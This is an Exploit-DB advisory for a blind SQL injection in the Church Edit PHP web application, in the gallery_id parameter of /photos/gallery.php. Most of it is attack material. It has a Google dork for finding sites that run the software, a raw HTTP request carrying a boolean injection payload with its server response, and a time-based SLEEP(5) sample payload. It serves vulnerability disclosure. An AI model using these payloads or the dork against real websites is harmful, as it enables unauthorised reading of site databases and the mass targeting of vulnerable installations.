Church Edit - Blind SQL Injection

2014-03-15T00:00:00
ID EDB-ID:32282
Type exploitdb
Reporter ThatIcyChill
Modified 2014-03-15T00:00:00

Description

Church Edit - Blind SQL Injection. Webapps exploit for php platform

                                        
                                            Exploit Title: Church Edit Blind SQL Injection
Google Dork: inurl:This website is powered by Church Edit
Date: 15/3/2013
Exploit Author: ThatIcyChill
Vendor Homepage: http://www.churchedit.co.uk/
Version: Initial Release
��������������������������������������������������������������������

The file "/photos/gallery.php" contains a Blind SQL
Injection Vulnerability in the '?gallery_id=' variable in the URL.

��������������������������������������������������������������������
GET /photos/gallery.php?gallery_id=1%20and%201=2&pg=1 HTTP/1.1
Host: <>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 15 Mar 2014 17:42:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
��������������������������������������������������������������������

Sample injection - www.example.org/photos/gallery.php?gallery_id=1 AND SLEEP(5)&pg=1